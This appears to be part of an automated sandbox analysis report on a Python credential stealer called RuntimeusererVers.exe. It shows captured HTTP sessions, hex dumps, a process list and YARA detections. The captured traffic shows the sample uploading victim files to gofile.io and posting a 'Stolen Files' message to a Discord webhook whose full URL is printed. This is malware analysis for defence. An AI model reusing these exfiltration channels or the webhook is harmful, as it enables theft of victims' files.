                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 96 47 ef 58 51 96 df 20 13 22 48 40 71 64 10 25 42 f2 99 1f 57 3d 6d d1 d5 74 af 6f 8c 6a 02 9b fa b1 10 30 5b ba 9b fc f7 8e b5 0a 72 71 cc 19 8a ce 86 93 b9 48 e9 da 88 36 a3 20 72 1f 29 c6 c9 bf 5f 1a 46 5d 83 e8 0c f7 0a b3 89 dc b0 52 55 a8 47 44 23 c1 ad fd 6f 5c fd 78 b1 ce 2a a9 9e b1 78 26 c3 65 7c 41 7a f8 f0 7a 04 99 ab b4 a2 4f 68 7d d9 27 80 78 1e ff 3b 8c b0 c3 dc 27 80 a3 40 a1 36 da c1 14 7f b8 ad f6 b6 6e 68 2e d8 c0 69 cb 68 e9 22 7e c2 e8 e1 7a db 6e 3a 7e 4c c2 7a e1 7e 69 38 fb b7 be f5 45 84 d3 0d 37 27 c3 4c e3 52 23 f3 fc 8d a3 1f c0 cb db c4 56 04 32 87 91 ce bb 77 5c 72 6e b2 7e b5 1f df e4 a1 c7 c0 bc 5f 8d 83 44 46 a4 4e 39 6c 9d a8 dc 5e 9b ca 4f 29 c5 bd fe b2 0a 1b 1d 24 52 1f 32 84 77 47 31 9a e4 db b5 b9 68 e6 86 df 3e 53
                                                                                                                                                                                                                                        Data Ascii: GXQ "H@qd%BW=mtoj0[rqH6 r)_F]RUGD#o\x*x&e|AzzOh}'x;'@6nh.ih"~zn:~Lz~i8E7'LR#V2w\rn~_DFN9l^O)$R2wG1h>S
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 40 b2 f6 71 7b 16 32 2e 80 17 75 7b 1a d0 3f 27 29 6c 6f b5 93 4a 19 6a 00 8c f2 b7 3f e9 c4 d5 5f e4 42 3f 71 de 91 39 21 6c b6 92 19 5a f2 c5 7d 3b 27 ea b0 c5 ad 9b a8 8d 53 c7 e6 d4 58 48 71 56 4c 57 0c e0 eb c1 e4 7a a9 78 80 f6 14 19 62 01 aa 50 fa 7f e2 24 b1 9b 29 b8 cb 34 f8 1c 70 35 17 c0 e9 90 d3 e0 7e 4f 00 a0 73 36 ca 2c bb 82 2c 56 c5 80 5d c3 58 78 0e a0 87 39 de b7 ea 30 b5 1e 4a 2f 7e 03 60 c2 38 c9 be 2c c4 b1 1a 66 d9 24 6d 3c 19 cc 31 9d 4f 83 ba dc a5 ac 76 e1 47 5f 93 8d 2e 2f 59 60 ff 49 ea 81 6d 7a 3d d5 97 b5 8d 51 f6 95 e7 aa b6 e3 ac 25 58 33 50 fc a6 21 67 9e 95 00 40 90 4c 33 59 78 42 ea 20 25 ba 09 b0 bc c9 8e b7 15 d5 c2 78 80 b7 06 3a b2 47 0c cc 9d e5 cf 19 ec 49 24 87 df 78 3d 6b 0f 64 37 5f 65 d2 82 c2 6a 78 d6 7b 4d 70
                                                                                                                                                                                                                                        Data Ascii: @q{2.u{?')loJj?_B?q9!lZ};'SXHqVLWzxbP$)4p5~Os6,,V]Xx90J/~`8,f$m<1OvG_./Y`Imz=Q%X3P!g@L3YxB %x:GI$x=kd7_ejx{Mp
                                                                                                                                                                                                                                        2024-11-15 09:46:44 UTC934INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:44 GMT
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731664005
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9lCGYLfOEfxsUw8m8vloy4LazLNa4gJ2nKglbXOnA35OIH82t9phx1Rw8XVFg95I%2Fvg9Csbo%2BN3GRN6S0zED%2BL6NZQyDe1hJb1fyeupzB8D7WLiw%2F7FymcIgnjf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8e2e50d6beafb787-DFW


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.104992745.112.123.1264438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:46 UTC132OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                                                        Host: api.gofile.io
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        2024-11-15 09:46:47 UTC1113INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Server: nginx/1.27.1
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:47 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                                                        2024-11-15 09:46:47 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                                                        Data Ascii: error-notFound


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.104993545.112.123.2274438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC238OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                                                        Host: store1.gofile.io
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Content-Length: 56125
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=4053daa8447c4cdaa2c54e41d948e50f
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC36OUTData Raw: 2d 2d 34 30 35 33 64 61 61 38 34 34 37 63 34 63 64 61 61 32 63 35 34 65 34 31 64 39 34 38 65 35 30 66 0d 0a
                                                                                                                                                                                                                                        Data Ascii: --4053daa8447c4cdaa2c54e41d948e50f
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC145OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 69 70 74 6b 69 64 46 49 4c 45 53 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 39 30 34 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="scriptkidFILES.zip"Content-Length: 55904
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 d5 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 d5 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 d6 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 d5 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 50 49 56 46 41 47 45 41 41 56 2f 50 4b 03 04 14 00 00 00 00 00 d5 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 50 57 43 43 41 57 4c 47 52 45 2f 50 4b 03 04 14 00 00 00 00 00 d5 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 53 55 41 56 54 5a 4b 4e 46 4c 2f 50 4b 03 04 14 00 00 00 08 00 f3 33 45 57
                                                                                                                                                                                                                                        Data Ascii: PK%oYDesktop/PK%oYDocuments/PK%oYDownloads/PK%oYPIVFAGEAAV/PK%oYPWCCAWLGRE/PK%oYSUAVTZKNFL/PK3EW
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC16384OUTData Raw: 6e cc e8 37 54 8a c9 f4 a1 28 92 ae 5d 62 b3 eb 00 eb 78 5d 6c 12 07 df 0e 71 46 0b 06 77 25 4f d9 51 fe 86 05 a7 14 57 ca 05 55 f6 96 9b 3b ab f6 82 9f 35 8c 7a e4 e3 a2 38 3e 63 af 72 04 e7 07 50 f7 6d 2c 08 ed 7e 1c c2 55 54 ce 26 54 c7 a4 2e d0 26 0f b8 ae 27 56 a6 a1 71 db 8e ad 04 06 14 f6 67 9b 6c 3f 83 78 a7 dc db f9 2e e7 e2 57 a5 a0 29 76 96 7e 0f 8b ac d8 b3 da 9b a9 da dc cf 1b ce 62 19 4d 32 99 71 96 3c fb 3b 39 c3 21 b2 f4 84 0e 98 7e 97 69 13 7c b0 9d 20 79 d5 9c 82 7b 8d be 1e bf 94 a7 77 54 91 ac 29 d9 22 dc 76 be 7b 9c 2a a2 c4 6e c8 69 70 09 39 5d f6 4f e5 33 b7 5d 46 e7 0e 89 1b e1 ea a8 bc a8 3c ba fe b6 b3 4a df a0 47 30 be f5 d1 c3 29 8d 53 b6 f4 dd fd c5 b2 90 af 4e 27 e8 63 9a 24 9c d5 9b bc 2f 7e 0b 8a b0 f5 49 d7 fb 1c 96 11 09
                                                                                                                                                                                                                                        Data Ascii: n7T(]bx]lqFw%OQWU;5z8>crPm,~UT&T.&'Vqgl?x.W)v~bM2q<;9!~i| y{wT)"v{*nip9]O3]F<JG0)SN'c$/~I
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC16384OUTData Raw: a0 e6 bb 11 64 3c fb 28 c3 74 d7 5c 99 03 78 86 f2 bc 49 85 f3 43 7b c7 5d 4b 3e b4 d7 62 05 48 5c de 9e ba bd cc 1a 12 fa 52 52 b8 4c 98 5e 9e c3 87 b8 2b f9 2f 3e d1 42 73 26 f8 90 d9 02 5b ce d1 99 24 9b 31 74 99 39 ec b6 6f 4b 6c 62 9a 37 8a 8b 4b f3 72 bc f5 8d cc 39 bb e9 65 10 66 f8 4a a9 67 e3 15 86 3f da 7c ee 49 45 0c a4 6b 2a b2 d9 ad f1 ad 4b 47 1d 84 da be d9 53 a4 83 7a b2 e2 e8 a5 20 1f a0 7b 53 43 6d 7b d3 5c e0 7d d7 3c df 6c 68 09 9a f1 cc c0 dc 7d eb ad 05 54 8e 6d 7c 11 5f 70 5f 70 5d 76 e5 fb be 74 bc 92 60 11 eb c9 87 25 2c b9 c3 3d c0 4b c6 38 b9 5a 23 73 19 25 ea 1e 16 a1 96 e0 e5 fb 50 73 9b ae f5 a4 10 64 86 d3 a4 ef 8c da 91 13 e4 e9 68 55 49 b2 56 e1 13 52 35 79 7e dc bd 2e e9 c4 6a 9b 8f 47 e3 b5 a3 51 9d ab 07 43 2d 1a f7 fb
                                                                                                                                                                                                                                        Data Ascii: d<(t\xIC{]K>bH\RRL^+/>Bs&[$1t9oKlb7Kr9efJg?|IEk*KGSz {SCm{\}<lh}Tm|_p_p]vt`%,=K8Z#s%PsdhUIVR5y~.jGQC-
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC6752OUTData Raw: 70 67 15 93 49 6e 40 21 0c 43 f7 95 7a a8 30 43 20 0c 21 c0 e7 fe 07 29 55 f6 91 fd 6c 5b 57 3f a7 6a 3e a0 c5 7c 32 fa 82 6f a5 13 92 78 6b 4d bb 60 a4 42 6b b5 f7 fd 4e c2 5a 94 2c 77 91 92 f7 f5 dc 64 f9 e2 84 96 40 ba ab c8 b1 b9 ec 5e 3a 30 b3 f7 3e 25 8f f6 dc 14 e7 d5 37 28 47 0e 1b 43 4b f1 a3 4f fc 0d 48 93 0e 86 33 d5 e9 6d cb a2 8a 49 a6 d4 43 54 0c 4b 9b 7d ec 65 4a a9 01 d7 d9 25 59 15 b8 11 d9 ee ce 4c 3c 92 74 33 a7 f1 d6 58 54 98 c5 c2 41 c4 fd 3e ce f5 5e 6f 15 e6 ad 78 c9 94 74 70 4e 1f 06 c1 de 51 49 cc 47 ca be b1 e8 b3 4e f6 6b ab b8 c1 fb 11 e7 e7 67 b8 3a 8a 7f de d4 ea 6d 31 94 ab 30 0c e4 21 58 3e 7b 95 77 c0 5f 0d 64 82 81 1b f5 2a b5 0b dd 7e dc f3 bc 53 92 94 6b d3 c4 62 a8 25 7f b8 6b ca b8 09 3e 58 e0 ca e4 ac a9 8a 0a 1d 43
                                                                                                                                                                                                                                        Data Ascii: pgIn@!Cz0C !)Ul[W?j>|2oxkM`BkNZ,wd@^:0>%7(GCKOH3mICTK}eJ%YL<t3XTA>^oxtpNQIGNkg:m10!X>{w_d*~Skb%k>XC
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC2OUTData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2024-11-15 09:46:48 UTC38OUTData Raw: 2d 2d 34 30 35 33 64 61 61 38 34 34 37 63 34 63 64 61 61 32 63 35 34 65 34 31 64 39 34 38 65 35 30 66 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: --4053daa8447c4cdaa2c54e41d948e50f--
                                                                                                                                                                                                                                        2024-11-15 09:46:50 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.27.1
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:50 GMT
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        Content-Length: 434
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                                                        2024-11-15 09:46:50 UTC434INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 31 36 36 34 30 31 30 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 76 49 49 45 6a 4f 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 54 31 53 50 6a 38 41 59 59 4e 33 42 36 50 53 63 57 52 38 57 55 46 65 48 30 4a 75 50 33 6b 52 59 22 2c 22 69 64 22 3a 22 64 35 62 38 38 33 36 66 2d 63 36 62 30 2d 34 34 36 66 2d 39 39 62 66 2d 61 35 37 34 64 66 39 34 66 66 62 64 22 2c 22 6d 64 35 22 3a 22 66 30 39 37 34 34 32 36 65 37 31 39 63 30 63 30 64 64 37 32 32 62 64 62 38 62 37 61 36 31 33 38 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 31 36 36
                                                                                                                                                                                                                                        Data Ascii: {"data":{"createTime":1731664010,"downloadPage":"https://gofile.io/d/vIIEjO","guestToken":"T1SPj8AYYN3B6PScWR8WUFeH0JuP3kRY","id":"d5b8836f-c6b0-446f-99bf-a574df94ffbd","md5":"f0974426e719c0c0dd722bdb8b7a6138","mimetype":"application/zip","modTime":173166


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.1049953162.159.138.2324438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:51 UTC276OUTPOST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Content-Length: 435
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        2024-11-15 09:46:51 UTC435OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 73 63 72 69 70 74 6b 69 64 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 2d 20 53 74 6f 6c 65 6e 20 46 69 6c 65 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3e 20 2a 2a 48 65 72 65 27 73 20 65 76 65 72 79 20 73 69 6e 67 6c 65 20 66 69 6c 65 20 66 72 6f 6d 20 74 68 65 20 76 69 63 74 69 6d 27 73 20 50 43 3a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 36 37 35 33 39 32 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 4b 65 79 4c 6f 67 67 65 72 20 5c 75 32 35 30 62 20 40 73 78 72 69 70 74 6b 69 64 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c
                                                                                                                                                                                                                                        Data Ascii: {"username": "scriptkid", "embeds": [{"title": "scriptkid - Stolen Files", "description": "> **Here's every single file from the victim's PC:**", "url": "", "color": 16753920, "footer": {"text": "scriptkid KeyLogger \u250b @sxriptkid"}, "thumbnail": {"url
                                                                                                                                                                                                                                        2024-11-15 09:46:51 UTC1352INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:51 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: __dcfduid=8a3af598a33611ef8e3d0e90f7c9821b; Expires=Wed, 14-Nov-2029 09:46:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731664012
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kl7Bqf3ql5uVHoaGivCV758ArKX5cAv2JmvJ3zcT%2BqHgvRNNnvugEbFnrQgH1IO9fl6QOx8toDvuPFnpFVCLT0KnHUiWEkN9P2igV2SRgeXBQQ%2BPK02LPX28WslS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Set-Cookie: __sdcfduid=8a3af598a33611ef8e3d0e90f7c9821bce6c0117b5de4c54f987a74f36362fc75a95fcd9b7c6acc26bf4c95a9ce7e415; Expires=Wed, 14-Nov-2029 09:46:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        Set-Cookie: __cfruid=5285e216218abd708035dbdafb13265a53a0f2b9-1731664011; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                        2024-11-15 09:46:51 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6c 67 49 50 66 41 5f 74 67 59 46 74 54 62 78 4d 55 57 47 41 30 7a 4b 32 53 44 47 75 4f 51 64 76 49 4b 73 4e 59 55 76 35 41 4e 6f 2d 31 37 33 31 36 36 34 30 31 31 34 36 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 32 65 35 31 30 36 66 61 66 64 36 62 34 38 2d 44 46 57 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: Set-Cookie: _cfuvid=lgIPfA_tgYFtTbxMUWGA0zK2SDGuOQdvIKsNYUv5ANo-1731664011462-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e2e5106fafd6b48-DFW


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:04:46:07
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff677eb0000
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5 hash:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:04:46:07
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:04:46:10
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7e14a0000
                                                                                                                                                                                                                                        File size:24'189'952 bytes
                                                                                                                                                                                                                                        MD5 hash:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:04:46:11
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "ver"
